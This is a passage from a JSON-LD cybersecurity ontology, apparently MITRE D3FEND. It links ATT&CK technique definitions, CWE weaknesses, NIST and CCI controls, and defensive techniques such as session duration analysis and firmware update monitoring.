      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-08-30T00:00:00"
      },
      "rdfs:label": "CCI-003014"
    },
    {
      "@id": "d3f:has-account",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x has-account y: The subject x has ownership or possession of some account y.",
      "rdfs:label": "has-account",
      "rdfs:seeAlso": {
        "@id": "http://wordnet-rdf.princeton.edu/id/02209474-v"
      },
      "rdfs:subPropertyOf": {
        "@id": "d3f:owns"
      }
    },
    {
      "@id": "d3f:Reference-CAR-2021-05-008%3ACertutilExeCertificateExtraction_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2021-05-008/"
      },
      "d3f:kb-abstract": "This search looks for arguments to certutil.exe indicating the manipulation or extraction of Certificate. This certificate can then be used to sign new authentication tokens specially inside Federated environments such as Windows ADFS.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessSpawnAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2021-05-008: Certutil exe certificate extraction",
      "rdfs:label": "Reference - CAR-2021-05-008: Certutil exe certificate extraction - MITRE"
    },
    {
      "@id": "d3f:CWE-239",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-239",
      "d3f:definition": "The product does not properly handle when a particular element is not completely specified.",
      "rdfs:label": "Failure to Handle Incomplete Element",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-237"
      }
    },
    {
      "@id": "d3f:DHCPServer",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:DHCPServiceApplication"
      },
      "d3f:definition": "A Dynamic Host Configuration Protocol (DHCP) server is a type of server that assigns IP addresses to computers.  DHCP servers are used to assign IP addresses to computers and other devices automatically.  The DHCP server is responsible for assigning the unique IP address to each device.",
      "d3f:manages": {
        "@id": "d3f:DHCPService"
      },
      "rdfs:isDefinedBy": {
        "@id": "dbr:Dynamic_Host_Configuration_Protocol"
      },
      "rdfs:label": "DHCP Server",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Server"
        },
        {
          "@id": "_:Naaf8df280eca4c43bd38884bde93cdc7"
        },
        {
          "@id": "_:N5aceb86a438942bcb175de128e26d03d"
        }
      ]
    },
    {
      "@id": "_:Naaf8df280eca4c43bd38884bde93cdc7",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DHCPServiceApplication"
      }
    },
    {
      "@id": "_:N5aceb86a438942bcb175de128e26d03d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:manages"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DHCPService"
      }
    },
    {
      "@id": "d3f:T1546.013",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1546.013",
      "d3f:definition": "Adversaries may gain persistence and elevate privileges by executing malicious content triggered by PowerShell profiles. A PowerShell profile  (<code>profile.ps1</code>) is a script that runs when [PowerShell](https://attack.mitre.org/techniques/T1059/001) starts and can be used as a logon script to customize user environments.",
      "d3f:modifies": {
        "@id": "d3f:PowerShellProfileScript"
      },
      "rdfs:label": "PowerShell Profile",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1546"
        },
        {
          "@id": "_:Na1bdc24ec0124703857f8f25d833379f"
        }
      ]
    },
    {
      "@id": "_:Na1bdc24ec0124703857f8f25d833379f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PowerShellProfileScript"
      }
    },
    {
      "@id": "d3f:CCI-000164_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system protects audit information from unauthorized deletion.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:PlatformHardening"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-05-22T00:00:00"
      },
      "rdfs:label": "CCI-000164"
    },
    {
      "@id": "d3f:T1077",
      "@type": "owl:Class",
      "d3f:attack-id": "T1077",
      "d3f:definition": "Windows systems have hidden network shares that are accessible only to administrators and provide the ability for remote file copy and other administrative functions. Example network shares include <code>C$</code>, <code>ADMIN$</code>, and <code>IPC$</code>.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1021.002",
      "rdfs:label": "Windows Admin Shares",
      "rdfs:seeAlso": {
        "@id": "d3f:T1021.002"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:LateralMovementTechnique"
      }
    },
    {
      "@id": "d3f:MemoryFreeFunction",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Releases previously reserved memory associated with a process.",
      "d3f:invokes": {
        "@id": "d3f:FreeMemory"
      },
      "rdfs:label": "Memory Free Function",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Subroutine"
        },
        {
          "@id": "_:N443d145d25524a969581c48eea5ca134"
        }
      ]
    },
    {
      "@id": "_:N443d145d25524a969581c48eea5ca134",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:FreeMemory"
      }
    },
    {
      "@id": "d3f:T1622",
      "@type": "owl:Class",
      "d3f:attack-id": "T1622",
      "d3f:definition": "Adversaries may employ various means to detect and avoid debuggers. Debuggers are typically used by defenders to trace and/or analyze the execution of potential malware payloads.(Citation: ProcessHacker Github)",
      "rdfs:label": "Debugger Evasion",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefenseEvasionTechnique"
        },
        {
          "@id": "d3f:DiscoveryTechnique"
        }
      ]
    },
    {
      "@id": "d3f:CWE-1276",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1276",
      "d3f:definition": "Signals between a hardware IP and the parent system design are incorrectly connected causing security risks.",
      "rdfs:label": "Hardware Child Block Incorrectly Connected to Parent System",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-284"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-4_32",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Information Flow Enforcement | Process Requirements for Information Transfer",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        }
      ],
      "rdfs:label": "AC-4(32)"
    },
    {
      "@id": "d3f:M1056",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseMitigation"
      ],
      "d3f:related": [
        {
          "@id": "d3f:DecoyEnvironment"
        },
        {
          "@id": "d3f:DecoyObject"
        }
      ],
      "rdfs:label": "Pre-compromise"
    },
    {
      "@id": "d3f:Reference-DecoyAndDeceptiveDataObjectTechnology_CymmetriaInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20170134423A1"
      },
      "d3f:kb-abstract": "A computer implemented method of detecting unauthorized access to a protected network by monitoring a dynamically updated deception environment, comprising launching, on one or more decoy endpoints, one or more decoy operating system (OS) managing one or more of a plurality of deception applications mapping a plurality of applications executed in a protected network, updating dynamically a usage indication for a plurality of deception data objects deployed in the protected network to emulate usage of the plurality of deception data objects for accessing the deception application(s) wherein the plurality of deception data objects are configured to trigger an interaction with the deception application(s) when used, detecting usage of data contained in the deception data object(s) by monitoring the interaction and identifying one or more potential unauthorized operations based on analysis of the detection.",
      "d3f:kb-author": "Dean Sysman; Gadi Evron; Imri Goldberg; Itamar Sher; Shmuel Ur",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "Cymmetria Inc",
      "d3f:kb-reference-of": [
        {
          "@id": "d3f:DecoySessionToken"
        },
        {
          "@id": "d3f:DecoyUserCredential"
        }
      ],
      "d3f:kb-reference-title": "Decoy and deceptive data object technology",
      "rdfs:label": "Reference - Decoy and deceptive data object technology - Cymmetria Inc"
    },
    {
      "@id": "d3f:CWE-147",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-147",
      "d3f:definition": "The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as input terminators when they are sent to a downstream component.",
      "rdfs:label": "Improper Neutralization of Input Terminators",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-138"
      }
    },
    {
      "@id": "d3f:T1552",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:Credential"
      },
      "d3f:attack-id": "T1552",
      "d3f:definition": "Adversaries may search compromised systems to find and obtain insecurely stored credentials. These credentials can be stored and/or misplaced in many locations on a system, including plaintext files (e.g. [Bash History](https://attack.mitre.org/techniques/T1552/003)), operating system or application-specific repositories (e.g. [Credentials in Registry](https://attack.mitre.org/techniques/T1552/002)),  or other specialized files/artifacts (e.g. [Private Keys](https://attack.mitre.org/techniques/T1552/004)).(Citation: Brining MimiKatz to Unix)",
      "rdfs:label": "Unsecured Credentials",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CredentialAccessTechnique"
        },
        {
          "@id": "_:N6ba1d38fb5e94586bad4d7e3460ac420"
        }
      ]
    },
    {
      "@id": "_:N6ba1d38fb5e94586bad4d7e3460ac420",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Credential"
      }
    },
    {
      "@id": "d3f:RemoteFirmwareUpdateMonitoring",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:RemoteFirmwareUpdateMonitoring"
      ],
      "d3f:d3fend-id": "D3-RFUM",
      "d3f:definition": "Monitoring of remote firmware update commands to identify unauthorized software installations.",
      "d3f:detects": {
        "@id": "d3f:OTDeviceFirmwareCommand"
      },
      "d3f:kb-article": "## How it works\nBy deploying sensors within the OT environment to passively monitor network traffic, tools can leverage deep packet inspection to identify protocol-specific commands and generate logs of relevant firmware activity. Additionally, these tools may incorporate behavioral and signature-based analysis to enhance detection and alerting capabilities.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-MethodForDetectingAnomaliesInTimeSeriesDataProducedByDevicesOfAnInfrastructureInANetwork"
      },
      "d3f:monitors": {
        "@id": "d3f:OTNetworkTraffic"
      },
      "rdfs:label": "Remote Firmware Update Monitoring",
      "rdfs:seeAlso": {
        "@id": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ApplicationProtocolCommandAnalysis"
        },
        {
          "@id": "_:Ncfcc2cfc70004b0f919e8492dd17b737"
        },
        {
          "@id": "_:N0a9da9f9b6ee4e71a2643a9774f00fd0"
        }
      ]
    },
    {
      "@id": "_:Ncfcc2cfc70004b0f919e8492dd17b737",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:detects"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTDeviceFirmwareCommand"
      }
    },
    {
      "@id": "_:N0a9da9f9b6ee4e71a2643a9774f00fd0",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:monitors"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTNetworkTraffic"
      }
    },
    {
      "@id": "d3f:Self-organizingMap",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-SOM",
      "d3f:definition": "A Self-Organizing Map (SOM) is a unsupervised learning model in Artificial Neural Network where the feature maps are the generated two-dimensional discretized form of an input space during the model training (based on competitive learning)",
      "d3f:kb-article": "## References\nGeeksforGeeks. (n.d.). ANN - Self Organizing Neural Network (SONN). [Link](https://www.geeksforgeeks.org/ann-self-organizing-neural-network-sonn/)",
      "rdfs:label": "Self-organizing Map",
      "rdfs:subClassOf": {
        "@id": "d3f:ANN-basedClustering"
      }
    },
    {
      "@id": "d3f:may-be-tactically-associated-with",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x may-be-tactically-associated-with y: the defensive action x may be a tactic that counters offensive action y.",
      "rdfs:label": "may-be-tactically-associated-with",
      "rdfs:subPropertyOf": {
        "@id": "d3f:may-be-associated-with"
      }
    },
    {
      "@id": "d3f:SessionDurationAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:SessionDurationAnalysis"
      ],
      "d3f:analyzes": [
        {
          "@id": "d3f:Authentication"
        },
        {
          "@id": "d3f:Authorization"
        }
      ],
      "d3f:d3fend-id": "D3-SDA",
      "d3f:definition": "Analyzing the duration of user sessions in order to detect unauthorized  activity.",
      "d3f:kb-article": "## How it works\nDetecting unauthorized user sessions by comparing the duration of a user logon session with a baseline behavior model. The behavior model comprises historical user session duration times.  Abnormalities between session duration and the behavior model may indicate suspicious activity.\n\n## Considerations\n* Potential for false positives from anomalies that are not associated with malicious activity.\n* Attackers may not differentiate their session duration enough to trigger an alert.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-MethodAndApparatusForNetworkFraudDetectionAndRemediationThroughAnalytics_IdaptiveLLC"
        },
        {
          "@id": "d3f:Reference-System,Method,AndComputerProgramProductForDetectingAndAssessingSecurityRisksInANetwork_ExabeamInc"
        }
      ],
      "rdfs:label": "Session Duration Analysis",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:UserBehaviorAnalysis"
        },
        {
          "@id": "_:N6a5d6b4f0a01427c9a27f15dd2075bc3"
        },
        {
          "@id": "_:Nb427c0811e1e4eb3b325ada7cf473fba"
        }
      ]
    },
    {
      "@id": "_:N6a5d6b4f0a01427c9a27f15dd2075bc3",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Authentication"
      }
    },
    {
      "@id": "_:Nb427c0811e1e4eb3b325ada7cf473fba",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Authorization"
      }
    },
    {
      "@id": "d3f:T1027.009",
      "@type": "owl:Class",
      "d3f:attack-id": "T1027.009",
      "d3f:definition": "Adversaries may embed payloads within other files to conceal malicious content from defenses. Otherwise seemingly benign files (such as scripts and executables) may be abused to carry and obfuscate malicious payloads and content. In some cases, embedded payloads may also enable adversaries to [Subvert Trust Controls](https://attack.mitre.org/techniques/T1553) by not impacting execution controls such as digital signatures and notarization tickets.(Citation: Sentinel Labs)",
      "rdfs:label": "Embedded Payloads",
      "rdfs:subClassOf": {
        "@id": "d3f:T1027"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTSP800-53ControlCatalog"
      ],
      "d3f:archived-at": {
        "@type": "xsd:anyURI",
        "@value": "https://csrc.nist.gov/publications/detail/sp/800-53/rev-5/final"
      },
      "d3f:has-member": [
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-17_8"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-23"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-24"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-24_1"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-24_2"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-2_1"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-2_13"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-2_2"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-2_3"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-2_4"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-2_5"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-2_6"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-2_7"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-2_9"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-3"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-3_11"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-3_13"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-3_3"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-3_7"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-3_8"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-4"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-4_1"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-4_10"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-4_11"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-4_12"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-4_13"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-4_14"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-4_15"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-4_17"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-4_19"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-4_20"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-4_21"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-4_26"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-4_27"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-4_28"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-4_29"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-4_3"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-4_30"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-4_32"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-4_4"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-4_5"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-4_6"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-4_8"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-5"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-6"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-6_1"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-6_10"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-6_3"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-6_4"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-6_5"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-6_6"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-6_9"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-7"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-7_3"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AC-7_4"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AU-10_5"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AU-14_2"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AU-15"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AU-2"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AU-2_1"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AU-2_2"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AU-3"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_AU-4"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_CM-14"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_CM-5"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_CM-5_1"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_CM-5_3"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_CM-5_5"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_CM-5_6"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_CM-6_3"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_IA-2_1"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_IA-2_2"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_IA-2_4"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_IA-2_6"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_IR-4_12"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_IR-4_13"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_MA-3_3"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_MA-3_4"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_MA-3_5"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_MA-3_6"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_MA-4_1"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_MA-6"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_MA-6_1"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_MA-6_2"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_MA-6_3"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_RA-3_3"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_RA-3_4"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_RA-5"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_RA-5_2"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_RA-5_3"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_RA-5_4"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_RA-5_5"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_RA-5_6"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_RA-5_7"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_SA-10_1"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_SA-10_3"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_SA-10_4"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_SA-10_5"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_SA-10_6"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_SA-11_1"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_SA-11_8"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_SA-8_18"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_SA-8_22"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_SC-2"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_SC-2_1"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_SC-3"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_SC-3_1"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_SI-2_4"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_SI-2_5"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_SI-2_6"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_SI-3"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_SI-3_10"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_SI-3_4"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_SI-3_8"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_SI-4"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_SI-4_2"
        },
        {
          "@id": "d3f:NIST_SP_800-53_R5_SI-4_4"
        }
      ],
      "d3f:version": 5,
      "rdfs:label": "NIST SP 800-53 R5",
      "rdfs:seeAlso": {
        "@id": "https://csrc.nist.gov/publications/detail/sp/800-53/rev-5/final"
      }
    },
    {
      "@id": "d3f:TA0104",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "rdfs:label": "Execution - ATTACK ICS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKICSTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ],
      "skos:prefLabel": "Execution"
    },
    {
      "@id": "d3f:CWE-908",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-908",
      "d3f:definition": "The product uses or accesses a resource that has not been initialized.",
      "rdfs:label": "Use of Uninitialized Resource",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-665"
      }
    },
    {
      "@id": "d3f:CWE-652",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-652",
      "d3f:definition": "The product uses external input to dynamically construct an XQuery expression used to retrieve data from an XML database, but it does not neutralize or incorrectly neutralizes that input. This allows an attacker to control the structure of the query.",
      "rdfs:label": "Improper Neutralization of Data within XQuery Expressions ('XQuery Injection')",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-91"
        },
        {
          "@id": "d3f:CWE-943"
        }
      ]
    },
    {
      "@id": "d3f:DS0007",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseDataSource"
      ],
      "d3f:definition": "A single file used to deploy a virtual machine/bootable disk into an on-premise or third-party cloud environment",
      "d3f:exactly": {
        "@id": "d3f:VMImage"
      },
      "rdfs:comment": "The digital artifact mapping for this data source is only applicable to the Image Metadata component",
      "rdfs:label": "Image (ATT&CK DS)"
    },
    {
      "@id": "d3f:PhiCoefficient",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-PC",
      "d3f:definition": "The phi coefficient (or mean square contingency coefficient is a measure of association for two binary variables.",
      "d3f:kb-article": "## References\n\\Wikipedia. (n.d.). Phi coefficient. [Link](https://en.wikipedia.org/wiki/Phi_coefficient)",
      "d3f:synonym": [
        "MCC",
        "Matthews Correlation Coefficient (in machine learning)"
      ],
      "rdfs:label": "Phi Coefficient",
      "rdfs:subClassOf": {
        "@id": "d3f:Correlation"
      }
    },
    {
      "@id": "d3f:CloudUserAccount",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A user account on a given host is a local user account for a given cloud and specified resources within that cloud.",
      "rdfs:label": "Cloud User Account",
      "rdfs:subClassOf": {
        "@id": "d3f:UserAccount"
      }
    },
    {
      "@id": "d3f:CWE-733",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-733",
      "d3f:definition": "The developer builds a security-critical protection mechanism into the software, but the compiler optimizes the program such that the mechanism is removed or modified.",
      "rdfs:label": "Compiler Optimization Removal or Modification of Security-critical Code",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1038"
      }
    },
    {
      "@id": "d3f:transmits",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x transmits y: The subject x actively emits object y onto a communication medium, rendering y observable and available for reception on that medium.",
      "rdfs:label": "transmits",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      },
      "skos:altLabel": "sends"
    },
    {
      "@id": "d3f:CWE-1293",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1293",
      "d3f:definition": "The product relies on one source of data, preventing the ability to detect if an adversary has compromised a data source.",
      "rdfs:label": "Missing Source Correlation of Multiple Independent Data",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-345"
      }
    },
    {
      "@id": "d3f:T1502",
      "@type": "owl:Class",
      "d3f:attack-id": "T1502",
      "d3f:definition": "Adversaries may spoof the parent process identifier (PPID) of a new process to evade process-monitoring defenses or to elevate privileges. New processes are typically spawned directly from their parent, or calling, process unless explicitly specified. One way of explicitly assigning the PPID of a new process is via the <code>CreateProcess</code> API call, which supports a parameter that defines the PPID to use.(Citation: DidierStevens SelectMyParent Nov 2009) This functionality is used by Windows features such as User Account Control (UAC) to correctly set the PPID after a requested elevated process is spawned by SYSTEM (typically via <code>svchost.exe</code> or <code>consent.exe</code>) rather than the current user context.(Citation: Microsoft UAC Nov 2018)",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1134.004",
      "rdfs:label": "Parent PID Spoofing",
      "rdfs:seeAlso": {
        "@id": "d3f:T1134.004"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefenseEvasionTechnique"
        },
        {
          "@id": "d3f:PrivilegeEscalationTechnique"
        }
      ]
    },
    {
      "@id": "d3f:ST0001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:SPARTATactic"
      ],
      "d3f:definition": "Threat actor is trying to gather information they can use to plan future operations.",
      "d3f:display-order": 1,
      "rdfs:label": "Reconnaissance - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/tactic/ST0001"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OffensiveTactic"
        },
        {
          "@id": "d3f:SPARTATactic"
        }
      ],
      "skos:prefLabel": "Reconnaissance"
    },
    {
      "@id": "d3f:CWE-336",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-336",
      "d3f:definition": "A Pseudo-Random Number Generator (PRNG) uses the same seed each time the product is initialized.",
      "rdfs:label": "Same Seed in Pseudo-Random Number Generator (PRNG)",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-335"
      }
    },
    {
      "@id": "d3f:CCI-000044_v2022-04-05",
